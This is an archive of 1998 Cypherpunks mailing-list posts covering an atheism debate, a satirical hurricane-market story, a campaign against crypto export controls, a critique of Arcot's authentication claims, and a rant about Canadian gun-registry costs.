> sceptical inquiry, and willingness to reject previously held positions
> due to new evidence or argument are probably not religious in nature.

Here is the catch in your distinction, the belief in those empirical
positions is fundamentaly based on faith. Critical to those beliefs are
at least two (any scientist worth anything could list many more) assumptions
that can *only* be taken on faith:

The universe and its operation is isotropic and homogenious

So clearly a belief in science as a method to describe the relations between
individuals and nature (at whatever scale) is fundamentaly based on faith.

As to your assertion that such a belief system is not a religion, please
take the time to review pantheism. It is clearly a religion in that it
addresses the relationship of the individual, society, nature, and God.
It does so by abandoning transcendence. You really should read some of
Spinoza's work as well as William James'.

Everything a person believes, for or against, is fundamentaly based on
unprovable axiomatic assumptions whose (in)correctness is based on faith
and by extension a belief in the correctness of the holder and the implied
fallibility of all other individuals who hold beliefs to the contrary. In a
very real sense religion is the epitomy of hubris.

>      The reason I challenged your assertion is that religious people
> often use such statements as a basis for further arguments that end up
> equivocating based on the term religion.  They first broaden the
> definition, by fiat, to be almost meaningless and then later use a
> much narrower definition to support their ultimate point.  I'm not
> suggesting that you were going to do this; I am simply pointing out
> why it is something of a sore point.

This entire paragraph makes no sense.

>      No, they are not.  The distinction is crucial to the main point I
> evidently failed to make in my previous message:  Atheism is not a set
> of beliefs that constitutes a personal philosophy.  There are Buddhist
> atheists, Universalist-Unitarian atheists, objectivist atheists,
> Wiccan atheists, etc.  Atheism isn't even a belief, it is merely the
> statement of a lack of one particular belief.

No, atheism is the statement that "God could exist, but doesn't". Whether
one chooses to hang 'Bhuddism' or 'Wiccan' on is irrelevant. We aren't
discussion labels but rather characteristics. Fundamentaly *ALL* atheism
states:

While it could happen that way, I don't believe it does.

Which is identical in meaning to:

While it could happen that way, I believe it doesn't.

>      Getting back to the strong v. weak distinction, the weak atheist
> position that one "does not believe god(s) exist" does not constitute
> a belief, a set of beliefs, or a personal philosophy, let alone a
> religion.  The strong atheist position that one "believes god(s) do
> not exist" is actually making a knowledge claim and so does constitute
> a belief.

Try to sell that spin-doctor bullshit to somebody else, and read a book on
basic logic.

>      I'm not trying to prove anything either.  I'm simply pointing out
> some issues regarding atheism that are too often ignored or confused.

Hence you are trying to prove that atheism is confused or ignored and as a
result is misundestood. I've got news for you, it isn't either. If anyone is
confused (and about to be ignored) it's yourself.

>      Now this part of the discussion I entered to satisfy my own
> curiosity.  Since it is so far off-topic for this list I'd be glad to
> take it to personal email if you wish.

Thanks but I don't generaly exchange private mail with strangers.

>  When you say "more than the
> earthly veil" do you mean that there exist phenomena that cannot, even
> in principle, be detected by our five senses or by any physical
> mechanism we can create?  If so, how do you know and why would it
> matter?

You didn't understand a single word in that explanation of transcendance.

There are many(!) phenomena that occur in nature that are not transcendental
that we can't in principle or practice experience with our five senses. Take
your Machian view of reality somewhere else.

As to knowing if something matters or not, that is the fundamental issue
involved in the question:

Does God exist?

We're back to where we started.

Signing off.
 
    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sun, 20 Sep 1998 16:36:44 +0800
To: cryptography@c2.net
Subject: It's Sunday and there's a hurricane coming...
Message-ID: <v04011704b22b2109cb83@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Date: Sun, 20 Sep 1998 15:13:53 -0400 (AST)
From: Ian Grigg <iang@systemics.com>
To: dbs@philodox.com, e$@vmeng.com
Subject: It's Sunday and there's a hurricane coming...
Reply-To: iang@systemics.com
Sender: <dbs@philodox.com>
Precedence: Bulk
List-Subscribe: <mailto:requests@philodox.com?subject=subscribe%20dbs>
X-Web-Archive: http://www.philodox.com/dbs-archive/

It's Sunday and there's a hurricane coming.  We're prepared
with the Pringles and Jamaican ginger beer, and are now just
watching the action on screen and out the window.

One of the things about living in the Financial Cryptography
Capital of the World is that occasionally we get visited by
The Powers That Be, and flattened in the process.

More nuisance than a TLA hate campaign, noisier than
professors' mailing list, and more water than a broken
pipe in a Cyber.  Hurricane Georges is coming to town.

The funny thing is that all along, or at least for many
years, we have known how to control hurricanes.  It was
inevitably one of those cold war US defence contracts, run
by the USAF.  There was some justification based on annoying
naval flotillas at sea, although it wasn't clear whether the
fly-boys were intending to annoy the USN or the Ruskies.
They kept the whole thing quiet, as nobody needs to know that
huge amounts of money can be saved and/or advancing armardas
can be sunk without using the other expensive toys developed
by the other programs.

Trials did occur, but the technology failed to make it into
the commercial market.  In order to hide the true potential,
the brass hats put a strict 56-miles limit on the application
for civilian purposes, thus revealing that you could only move
the beast around, you couldn't really tame it.

The real problem with the technology was that hurricanes still
wanted to go in roughly the same direction, and all one could
do was to pay the fee to the Air Force to get it moved 56 miles
up or down the coast.  Needless to say, the Generals were
surprised to receive competing bids for services in the first
live civilian hurricane.

After a lot of confusion and multiple contradictory bids being
accepted, the hurricane entered, destroyed, and left.  As did
the Generals, with the loot.  This misuse of what were now public
funds was considered sufficient to slap the exec order on the
whole deal, conveniently making illegal any class action suits
over the misused private funds.

Working on this problem for some time has led to a solution.
Using an anonymous cash protocol, we have built an Internet-based
solution for setting the market-driven price for a hurricane path.
Conveniently, we have also contracted delivery services from the
specialists, those very same Generals, who are now living in the
islands near here under assumed names and ranks.

Up until now, the whole idea was received with less than religous
fervour.  Either nobody believed we could do it, or the locals
were simply playing on island time.  Just as we were about to give
it up and retire to banana growing, Georges showed up and contracts
started winding in.

Market operators have a duty to track activity and ensure
that no insider trading occurs (those pesky Generals).  This
responsibility has expanded into advice for traders of attractive
opportunities for investment, either in the future positions
market or in our line of lamps, air-dropped generators, and
emergency supplies of Pringles.

We've also been able to track geographical trends for governmental
statistical purposes.  Georges was nominally slated to cross the
islands at Guadeloupe, but heavy market pressure backed by church
collections on thursday night purchased a shift north in track.
Getting in early was profitable for the Guadeloupians.

St Martins then bought heavily and shifted it back on a close
to due east track.   Unfortunately the French fluffed it last night
by downgrading their alert to a warning, so all the world knows now.

Antigua, being stuck in the middle, then bought in, backed up by
Monsterrat (who raised funds by threatening the Brits with another
thousand refugees).  Since then Georges has been yoyoing across the
map and the market has gone to hell in a hand basket.

The Generals had been raking in the delivery contracts, but have
posted an aircraft maintainance alert and tripled the premium.

Antiguan alternate government types, engaged in a power play
with their legal counterparts, have traded a mammoth contract to
have the hurricane move _towards_ them.  Unhappy at the Generals'
reluctance to fly, they've issued an options contract of another
kind on the market operators, that will be 'in the money' if their
other contract is not fulfilled.

Meanwhile, a catholic mama in the US virgin islands had a little
flutter on the market to help her more easterly daughter.

Failing to spot mama's anonymous currency transaction form, the IRS have
declared the area in general and hurricanes in particular to be a major
money laundering effort, and have a SWOT team flying in.  At least, the
men in black will fly in once they complete negotiations with the Generals,
who previously contracted all airports for the hurricane season, and
are prepared to deal in exchange for an amnesty for previous picadillos.

The market still goes strong, having at this stage traded 10% of
the GDP of the East Caribbean.  We're prepared for the long run,
with defense in depth by redundant UPS and generators, multiple IP
and interlocking 50 cal machine guns.  If only we could stop our
shareholders from killing each other, we could advance our plans
to open trading in Florida.

Phew.  This Jamaican ginger beer is strong stuff, and we're already
out of Pringles.  Oh, and there's a hurricane coming.


El Generalissimo.

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sun, 20 Sep 1998 16:44:16 +0800
To: cypherpunks@cyberpass.net
Subject: GILC Campaign to remove crypto restrictions from Wassenaar              Arrangement
Message-ID: <v04011708b22b2236127b@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Mime-Version: 1.0
X-Priority: 3 (Normal)
X-Msmail-Priority: Normal
X-Mimeole: Produced By Microsoft MimeOLE V4.72.2106.4
Importance: Normal
Date:         Fri, 18 Sep 1998 04:41:24 -0500
Reply-To: Digital Signature discussion <DIGSIG@LISTSERV.TEMPLE.EDU>
Sender: Digital Signature discussion <DIGSIG@LISTSERV.TEMPLE.EDU>
From: Richard Hornbeck <rhornbec@COUNSEL.COM>
Subject:      GILC Campaign to remove crypto restrictions from Wassenaar
              Arrangement
To: DIGSIG@LISTSERV.TEMPLE.EDU

The following excerpt from the Global Internet Liberty Campaign (GILC) Web
page http://www.efa.org.au/wassenaar/support/
briefly describes its recent issuance of a statement calling for the removal
of cryptography export restrictions from the Wassenaar Arrangement. Further
background information on this international Arrangement, and on the
considerable international support for this statement can be found at
Electronic Frontiers Australia (EFA)'s Web Site. Dr. Michael Baker of EFA is
the primary author and original sponsor for the GILC statement. Further
information is also available at the Wassenaar organization's Web site,
http://www.wassenaar.org/

In principle, Wassenaar is the international version of those regulations
that currently place restrictions on exporting strong crypto outside the
U.S. All of the 33 member countries agree to abide by a set of standards for
exporting encryption products from their countries, for the benefit or
preventing terrorism, making international law enforcement's job easier,
etc.

Individuals subscribing to this list may wish to review this material, and
add their organization or association's support to this important campaign.
It is timed to coincide with the current round of Wassenaar talks in Vienna
that begin this month, and continue through November.

Richard Hornbeck
==============================================================

The major impediment to the wide spread adoption of cryptography, to protect
vital infrastructures from attack
and electronic commerce from fraud, has been controls on the export of
cryptography. The only international
agreement on the export of cryptography is the Wassenaar Arrangement, which
wrongly classes encryption as
a dual-use technology (one that could be used for offensive purposes).

On 15th September 1998 Members of the Global Internet Liberty Campaign
issued a statement calling for the
removal of cryptography export restrictions from the Wassenaar Arrangement.

Since then companies and associations have been expressing their support for
the statement.

If your company or association wishes to "sign" the following support
statement:

     "We, the undersigned companies and associations support the Global
Internet Liberty Campaign
     Member Statement of 15th September 1998 calling for the removal of
cryptography export restrictions
     from the Wassenaar Arrangement."

please write to <signon@efa.org.au> giving your company or association name,
web address and country.

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alia Johnson <lodi@well.com>
Date: Sun, 20 Sep 1998 20:05:53 +0800
To: Declan McCullagh <declan@well.com>
Subject: Re: CJ Update
In-Reply-To: <Pine.GSO.3.95.980920131754.12842I-100000@well.com>
Message-ID: <Pine.GSO.3.96.980920180712.21115A-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain



Thanks, Declan, and please copy me with whatever saunters down the pike.

Alia

On Sun, 20 Sep 1998, Declan McCullagh wrote:

> I've received two messages from Carl Johnson in letter form. He seems in,
> um, good spirits. He also mentions a BabyTruthMongerel at one point. 
> 
> He asks that his messages be passed on to cypherpunks, and I have no
> objection, after I'm done writing the fourth part of the article. We could
> presumably scan them in and put them up on pathfinder.com.
> 
> -Declan
> 
> 
> 
> On Sat, 19 Sep 1998, John Young wrote:
> 
> > >From Alia Johnson <lodi@well.com>, CJ's sister, today:
> > 
> > I'm writing to say that CJ has arrived at the Springfield Medical
> > Referral Center, where he will be held for a month or more (the 
> > phone says U.S.  Medical Center for Federal Prisoners) for 
> > "examination". 
> > 
> > Here is the address:  
> > 
> >             Carl E. Johnson
> > 			Register # 05987-196
> >              U.S. Medical Center for Federal Prisoners
> > 	          P.O. Box 4000
> >              Springfield, Missouri  65801
> > 
> > Also, to my delight, I received a letter from him today. He sounds okay.
> > 
> > CJ in his letter asks for physical mailing addresses for some of the
> > cypherpunks (no one specifically) so that he can send you things to 
> > post since I will be travelling.
> > 
> > [End Alia]
> > 
> > ---------
> > 
> > We'll be happy to digitize and/or post any mail from CJ folks want to 
> > share, anonymous and/or encrypted always welcome:
> > 
> > Fax: 212-799-4003
> > Vox: 212-873-8700
> > 
> > Snail:
> > 
> > John Young
> > 251 West 89th Steet, Suite 6E
> > New York, NY 10024
> > 
> > We've put all our PGP keys at: 
> > 
> >    http://jya.com/jya-keys.txt
> > 
> > And a bunch of keys for the wild bunch of Totos:
> > 
> >    http://jya.com/totos-keys.htm
> > 
> > 
> > 
> > 
> > 
> > 
> 
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@cypherpunks.to>
Date: Sun, 20 Sep 1998 11:43:59 +0800
To: Ryan Lackey <rdl@MIT.EDU>
Subject: Re: ArcotSign (was Re: Does security depend on hardware?)
In-Reply-To: <199809192038.QAA29964@denmark-vesey.MIT.EDU>
Message-ID: <Pine.BSF.3.96.980920181732.10980B-100000@pakastelohi.cypherpunks.to>
MIME-Version: 1.0
Content-Type: text/plain



On Sat, 19 Sep 1998, Ryan Lackey wrote:

> 
> [from a discussion of tamper-resistant hardware for payment systems
> on dbs@philodox.com, a mailing list dedicated to digital bearer systems,
> where Scott Loftesness, of DigiCash and Arcot Systems, mentioned ArcotSign.]
> 
> You mentioned the URL for Arcot, and I looked at the site.  It seems
> rather lacking in technical details, and makes a very strong claim --
> that it can provide tamper resistance in software on a hardware/OS/etc.
> platform which is generally hostile (a general purpose computer).

>From the technical description of Arcot's WebFort technology at 
http://www.arcot.com/WebFort1.htm, the product sets up an encrypted and
authenticated channel between the client and the server. You could use
standard SSL with client certs to achieve the same result.

What concerns me are the other outrageous claims made on the site:

o Conventional software solutions offering public key authentication, such
as those from Microsoft, Netscape, and Entrust are no stronger than
username/password mechanisms. [False. UID/PW's are subject to guessing.
Client certs are not].

o ArcotCard is a tamper resistant software only private key storage
system. [Anybody using the words "tamper resitant" to describe a software
based solution is incompetent at best].

o ArcotSignTM technology is a breakthrough that offers smart card tamper
resistance in software. Arcot is unique in this regard, and WebFort is the
only software-only web access control solution on the market that offers
smart card security, with software convenience and cost. [We have now
entered deep snake oil territory. Claims that software affords tamper
resistance comparable to hardware tokens are either based in dishonesty or 
levels of incompetence in league with "just as secure pseudo-ontime
pads"].

In summary, based on the technical information provided by Arcot System,
the product is a software based authentication system using software based
client certificates.

-- Lucky Green <shamrock@cypherpunks.to> PGP v5 encrypted email preferred.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjm@spe.com
Date: Sun, 20 Sep 1998 16:06:35 +0800
To: cypherpunks@cyberpass.net
Subject: atheism (was: RE: Democracy... (fwd)) (fwd)
In-Reply-To: <199809191325.IAA08217@einstein.ssz.com>
Message-ID: <8888-Sun20Sep1998201338+0200-pjm@spe.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate writes:
 > Patrick May writes:
 > >      Not all philosophies are religions.
 > 
 > If we are talking philosophies of the range to include 'natural philosophy'
 > (ie physics) then you are correct. Fortunately, this attempt at shifting the
 > topic of discussion away from personal or individual philosophies relating
 > to the relationship between individuals, God, and the cosmos  won't work.

     Excuse my shorthand:  Not all "personal" philosophies are religions.

[ . . . ]
 > >  Asserting so is an attempt
 > > to make one or both of the terms meaningless.
 > 
 > And trying to change the subject of discourse is as well. A philosophy is a
 > set of beliefs, period. In this particular case we are discussing personal
 > or individual philosophies and from definition and practice they are
 > identical. Religion after all is nothing more than a set of beliefs and
 > therefore falls under 'personal philosophy'.

     Personal philosophies are a superset of personal religious
beliefs.  Personal philosophies that include the concept of a god are
clearly religious in nature.  Personal philosophies that include the
concept of "faith" are probably religious in nature.  Personal
philosophies that include the concepts of empirical evidence,
sceptical inquiry, and willingness to reject previously held positions
due to new evidence or argument are probably not religious in nature.

     The reason I challenged your assertion is that religious people
often use such statements as a basis for further arguments that end up
equivocating based on the term religion.  They first broaden the
definition, by fiat, to be almost meaningless and then later use a
much narrower definition to support their ultimate point.  I'm not
suggesting that you were going to do this; I am simply pointing out
why it is something of a sore point.

[ . . . ]
 > >      There are two forms of atheism (visit alt.atheism.moderated for
 > > an unending discussion).  "Strong" atheists state that they "believe
 > > that god does not exist."  "Weak" atheists state that they "do not
 > > believe that god exists."
 > 
 > Changing the side on which the 'do not' resides doesn't change the meaning.
 > These two sentences are identical in content and meaning.

     No, they are not.  The distinction is crucial to the main point I
evidently failed to make in my previous message:  Atheism is not a set
of beliefs that constitutes a personal philosophy.  There are Buddhist
atheists, Universalist-Unitarian atheists, objectivist atheists,
Wiccan atheists, etc.  Atheism isn't even a belief, it is merely the
statement of a lack of one particular belief.

     Getting back to the strong v. weak distinction, the weak atheist
position that one "does not believe god(s) exist" does not constitute
a belief, a set of beliefs, or a personal philosophy, let alone a
religion.  The strong atheist position that one "believes god(s) do
not exist" is actually making a knowledge claim and so does constitute
a belief.  Recognizing that someone holds the strong atheist position
may give some clues to their other beliefs and the remainder of their
personal philosophy, but, again, that position alone does not
constitute a personal philosophy or religion.

[ . . . ]
 > >      Without reason and logic, how do you propose to prove these
 > > assertions?
 > 
 > I'm not trying to prove anything, you are. I'm just blowing holes in your
 > reasoning.

     I'm not trying to prove anything either.  I'm simply pointing out
some issues regarding atheism that are too often ignored or confused.

[ . . . ]
 > >      All faith-based assertions are by definition irrational.  Mystics
 > > frequently speak of transcendence as if the word denotes a concept
 > > with a particular meaning, but never provide a coherent definition.
 > > Perhaps you'll surprise me?
 > 
 > Transcendence is the belief that there is something more than the earthly
 > veil. In other words, if you practice a transcendantal religion then by
 > definition you believe in a ghost-in-the-machine of one form or another.
 > 
 > If you like you can think of it as one set of religions believes there is
 > purpose and reason in existance whereas others believe that it is all random
 > dice (and yes that is a broad brush I'm painting with).

     Now this part of the discussion I entered to satisfy my own
curiosity.  Since it is so far off-topic for this list I'd be glad to
take it to personal email if you wish.  When you say "more than the
earthly veil" do you mean that there exist phenomena that cannot, even
in principle, be detected by our five senses or by any physical
mechanism we can create?  If so, how do you know and why would it
matter?

Regards,

pjm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@hun.org>
Date: Sun, 20 Sep 1998 17:57:02 +0800
To: Robert Hettinga <rah@shipwright.com>
Subject: Re: It's Sunday and there's a hurricane coming...
In-Reply-To: <v04011704b22b2109cb83@[139.167.130.246]>
Message-ID: <Pine.BSF.3.96.980920225235.397G-100000@hun.org>
MIME-Version: 1.0
Content-Type: text/plain




    careful, Bob --they'll be saying this reeks of another
    philosophical argument which has two CPers MIA.

    Big Brother is watching the list --or at least the IRS-CID is.

	attila out...

    P.S. BTW, IMNSOHO, good fiction and worth the read!


On Sun, 20 Sep 1998, Robert Hettinga wrote:

>
>--- begin forwarded text
>
>
>Date: Sun, 20 Sep 1998 15:13:53 -0400 (AST)
>From: Ian Grigg <iang@systemics.com>
>To: dbs@philodox.com, e$@vmeng.com
>Subject: It's Sunday and there's a hurricane coming...
>Reply-To: iang@systemics.com
>Sender: <dbs@philodox.com>
>Precedence: Bulk
>List-Subscribe: <mailto:requests@philodox.com?subject=subscribe%20dbs>
>X-Web-Archive: http://www.philodox.com/dbs-archive/
>
>It's Sunday and there's a hurricane coming.  We're prepared
>with the Pringles and Jamaican ginger beer, and are now just
>watching the action on screen and out the window.
>
>One of the things about living in the Financial Cryptography
>Capital of the World is that occasionally we get visited by
>The Powers That Be, and flattened in the process.
>
>More nuisance than a TLA hate campaign, noisier than
>professors' mailing list, and more water than a broken
>pipe in a Cyber.  Hurricane Georges is coming to town.
>
>The funny thing is that all along, or at least for many
>years, we have known how to control hurricanes.  It was
>inevitably one of those cold war US defence contracts, run
>by the USAF.  There was some justification based on annoying
>naval flotillas at sea, although it wasn't clear whether the
>fly-boys were intending to annoy the USN or the Ruskies.
>They kept the whole thing quiet, as nobody needs to know that
>huge amounts of money can be saved and/or advancing armardas
>can be sunk without using the other expensive toys developed
>by the other programs.
>
>Trials did occur, but the technology failed to make it into
>the commercial market.  In order to hide the true potential,
>the brass hats put a strict 56-miles limit on the application
>for civilian purposes, thus revealing that you could only move
>the beast around, you couldn't really tame it.
>
>The real problem with the technology was that hurricanes still
>wanted to go in roughly the same direction, and all one could
>do was to pay the fee to the Air Force to get it moved 56 miles
>up or down the coast.  Needless to say, the Generals were
>surprised to receive competing bids for services in the first
>live civilian hurricane.
>
>After a lot of confusion and multiple contradictory bids being
>accepted, the hurricane entered, destroyed, and left.  As did
>the Generals, with the loot.  This misuse of what were now public
>funds was considered sufficient to slap the exec order on the
>whole deal, conveniently making illegal any class action suits
>over the misused private funds.
>
>Working on this problem for some time has led to a solution.
>Using an anonymous cash protocol, we have built an Internet-based
>solution for setting the market-driven price for a hurricane path.
>Conveniently, we have also contracted delivery services from the
>specialists, those very same Generals, who are now living in the
>islands near here under assumed names and ranks.
>
>Up until now, the whole idea was received with less than religous
>fervour.  Either nobody believed we could do it, or the locals
>were simply playing on island time.  Just as we were about to give
>it up and retire to banana growing, Georges showed up and contracts
>started winding in.
>
>Market operators have a duty to track activity and ensure
>that no insider trading occurs (those pesky Generals).  This
>responsibility has expanded into advice for traders of attractive
>opportunities for investment, either in the future positions
>market or in our line of lamps, air-dropped generators, and
>emergency supplies of Pringles.
>
>We've also been able to track geographical trends for governmental
>statistical purposes.  Georges was nominally slated to cross the
>islands at Guadeloupe, but heavy market pressure backed by church
>collections on thursday night purchased a shift north in track.
>Getting in early was profitable for the Guadeloupians.
>
>St Martins then bought heavily and shifted it back on a close
>to due east track.   Unfortunately the French fluffed it last night
>by downgrading their alert to a warning, so all the world knows now.
>
>Antigua, being stuck in the middle, then bought in, backed up by
>Monsterrat (who raised funds by threatening the Brits with another
>thousand refugees).  Since then Georges has been yoyoing across the
>map and the market has gone to hell in a hand basket.
>
>The Generals had been raking in the delivery contracts, but have
>posted an aircraft maintainance alert and tripled the premium.
>
>Antiguan alternate government types, engaged in a power play
>with their legal counterparts, have traded a mammoth contract to
>have the hurricane move _towards_ them.  Unhappy at the Generals'
>reluctance to fly, they've issued an options contract of another
>kind on the market operators, that will be 'in the money' if their
>other contract is not fulfilled.
>
>Meanwhile, a catholic mama in the US virgin islands had a little
>flutter on the market to help her more easterly daughter.
>
>Failing to spot mama's anonymous currency transaction form, the IRS have
>declared the area in general and hurricanes in particular to be a major
>money laundering effort, and have a SWOT team flying in.  At least, the
>men in black will fly in once they complete negotiations with the Generals,
>who previously contracted all airports for the hurricane season, and
>are prepared to deal in exchange for an amnesty for previous picadillos.
>
>The market still goes strong, having at this stage traded 10% of
>the GDP of the East Caribbean.  We're prepared for the long run,
>with defense in depth by redundant UPS and generators, multiple IP
>and interlocking 50 cal machine guns.  If only we could stop our
>shareholders from killing each other, we could advance our plans
>to open trading in Florida.
>
>Phew.  This Jamaican ginger beer is strong stuff, and we're already
>out of Pringles.  Oh, and there's a hurricane coming.
>
>
>El Generalissimo.
>
>--- end forwarded text
>
>
>-----------------
>Robert A. Hettinga <mailto: rah@philodox.com>
>Philodox Financial Technology Evangelism <http://www.philodox.com/>
>44 Farquhar Street, Boston, MA 02131 USA
>"... however it may deserve respect for its usefulness and antiquity,
>[predicting the end of the world] has not been found agreeable to
>experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
>

__________________________________________________________________________
    go not unto usenet for advice, for the inhabitants thereof will say:
      yes, and no, and maybe, and I don't know, and fuck-off.
_________________________________________________________________ attila__

    To be a ruler of men, you need at least 12 inches....
    There is no safety this side of the grave.  Never was; never will be.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Sun, 20 Sep 1998 22:30:16 +0800
To: "Donna Ferolie, Canadian Institute for Legislative Action" <Martin.P@parl.gc.ca>
Subject: financial analysis of Canadian gun controll bill ( C-68 )
Message-ID: <199809210324.XAA00921@cti06.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain



Excerpt from:
Cdn-Firearms Digest  Sunday, September 20 1998  Volume 02 : Number 597

Date: Sun, 20 Sep 1998 05:33:19 -0600
From: Jean Hogue <jean_hogue@sympatico.ca>
Subject: 360 Millions For What?

1. 360 Millions For What ?

background: the CFC finally spit out the revised estimate of
registration until the end year 2002:
        120 millions in set up costs
        240 millions for operation (60 M per year for 4 years). 

- ------

Reference:    canadian firearms digest v. 2 # 595
        Date: Thu, 17 Sep 1998 19:26:57 -0600
        From: David A Tomlinson <nfadat@telusplanet.net>
        Subject: BOY ARE THEY GONNA BOMB...

> If, however, it is an unrestricted rifle or shotgun, then it will NOT have
> to be "verified" -- no matter how many times it is transferred and
> re-registered -- until 01 Jan 2003.


Let me see if I can get this straight now:

- -- a) re-arrangement of the data set:

In order to justify the National Firearms Registry (and the whole CFC
existence), the Canadian Firearms Centre came out with its own
statistics, having rejected the actual firearms crime figures from both
the RCMP and Statistics Canada.

The CFC's point what to "prove" that the "problem" firearms were not the
legally registered restricted firearms (these were so easy to ban
outright) but the unrestricted  rifles and shotguns.

- -- b) verification: flavor of the day

First, the CFC came out with the dumb "fill-it-in-yourself" postcard,
guaranteed to collect essentially trash and hopelessely corrupt the
entire National Firearms Registry.

Second, the CFC announced that after the registration deadline (Dec. 31,
2002), all the 7 million records would be examined to weed out the
trash. An impossible task.  Hercules did not pussyfoot around with a
shovel in Augias' stables. It means that the registration work would
have to be redone entirely and taking a corrupt database as the only
source of information. At the end of 2002, the National Firearms
Registry would be a collection of trash with absolutely no legal value.

The importance of "legal value" ? Let's see ... "A Ruger Mini-14 ? No, I
surrendered that newly banned gun years ago. Your records must be wrong.
No, I did not keep the stinking receit. I don't have to prove I'm
innocent, you have to prove I'm guilty. Get lost !" What they goonna do
? Break down the door at 03:00 with machine guns ?

Third, the CFC announced it would do verification on the fly. Stuck with
sky-rocketing costs, the best it could come up with was to recruit
6,000, then 3,000 unpaid volunteers --  a few weeks before the law is to
take effect on Oct. 1, 1998. Each of them would have to proceed with an
average number of 2,300 verifications within a 4-year time frame to
ensure the protection of 7 miilion firearm registration records against
corruption.

Fourth, DAT's posting now clarifes that verification only applies to
restricted firearms. This coincides with the last few days left before
Oct. 1st and a seeming conclusion that the CFC failed to find in time
3,000 persons dumb enough to come mow their lawn for free.

- -- end result :

    - the CFC's own self-serving estimates of 7 million firearms
      (a case has been made of an actual number of 20 millions)

    - registered restricted firearms records with the gov.: 1 million

    ---> rifles/shotguns outnumber restricted guns by 6:1

1. 86 % of registration applications (rifles and shotguns) will be
exempt from verification. Brilliant ! A few days before the Oct. 1st
deadline, we are now back at square two: 6 million trash records, to be
verified "maniana". (Spanish for either really "tomorrow" or "in the
fullness of time", the audience must judge which applies). 

2. The remaining 14 % (handguns and other restricteds) already on file
were ALREADY verified and need to verified AGAIN (but rifles and
shotguns only need to be registered ONCE ever - right !).

3. The principle of the day is that the firearms allegedly most often
used in domestic violence do not need no stinking verification but the
considerably smaller stock of restricted firearms already verified must
be verified.

Conclusion:

For 360 millions, we will end up with a National Firearms Registry with
absolutely no legal value.

In 2003, a new round of hundreds of millions will be required again to
magically clean up an entirely corrupt Registry. No deadline set. Hey
CFC, please don't say it. I do not want to be told again that the enire
after-the-fact verification program will only cost 85 millions.

It really is not that complicated. Either the registration applications
need to be verified or they don't. A rifle/shotgun owner is just as
liable as a handgun owner to make a mistake when describing a firearm on
a registration form.

Arguing that the type of firearm changes the requirement is essentially
negociating on the principle. (Clinton: oral sex does not count as a
sexual relationship).

The sort of people who have not figured out yet that a principle is
somehting that is not open to negociation and compromise are the sort of
people who have no principles.

So, in the end, the registration process will have worthless data on the
unrestricted firearms -- allegedly the ones most often used in crime and
the emphasis on accurate registration will be placed on the other,
considerably smaller lot, of firearms.

Odd, I thought this is what the government has been doing since 1934.
And failed ever since.

Do not pass go, do not collect $ 200, lose a turn and go back to square
0.

    IS THIS WHAT WE GET FOR 360 MILLIONS ?

And Allan Rock, who brought us C-68, now does not have money to
compensate hep-C victims.

- ---------------

2.    Question to the CFC: When are you going to disclose your revised fees
?

Announced roughly within the same time frame as the 85 million dollar
cost for the entire 7-year gun registry (starting from 1995 until the
end of 2002).

The following base figures are those of the CFC:

    registration fee: $ 10 initially for "up to 10 firearms", increasing to
$ 18.
    possession permit: $ 10 initially, increasing to $ 60 near the end.
    number of gun owners: 3 millions
    number of firearms: 7 millions
    proportion of gun owners enticed into early compliance by low initial
fee: 30%
    average number of firearms per gun owner: 2.3 (less than 10)

    First 30 %: 900,000 gun owners, 2.1 million guns:         18 M$
            0.9 million permits x $ 10/permit = 9 M$
            0.9 million registrations x $ 10  = 9 M$

    Last 70 % : 2.1 million gun owners, 4.9 million guns:            164 M$
            2.1 million permits x $ 60/permit = 126 M$
            2.1 million registrations x $ 18  =  38 M$

    Total tax grab by Dec. 31st, 2002                182 M $
                                    -------

Note that the number of registration applications is equal to the number
of gun permit applications because we are allowed "up to 10 firearms"
for the same fee.

Now, the following secnarios to consider are :

1- the bureaucrats really believed the 85 million figure  -- and they
were going to bilk gun owners out of an extra 100 million dollars right
from the start, more than twice what they actually "needed";

2- the bureaucrats have known for a long time that the fee schedule they
published covers only half of the actual costs of 360 millions. Just as
they stalled and stonewalled and denied for as long as possible the true
extent of their spendings, they are also stalling and stonewalling on
the real fees they will have to charge to cover their lavish lifestyle.

I doubt very much scenario 1 is true -- the bureaucrats could not be so
naive, the Surete du Quebec itself will set up a staff of up 200 at the
cost of 40 millions, close to half the 85 million total. Scenario 2
shows we cannot believe Ottawa's fee structure anymore than we can
believe its total cost estimates nor its crime statistics.

In a nutshell:
- - The bureaucrats could not do it for 85 mmillions.
- - The bureaucrats cannot do it for 360 millions. (at that point, only
gone through the motions, unvalidated registry).
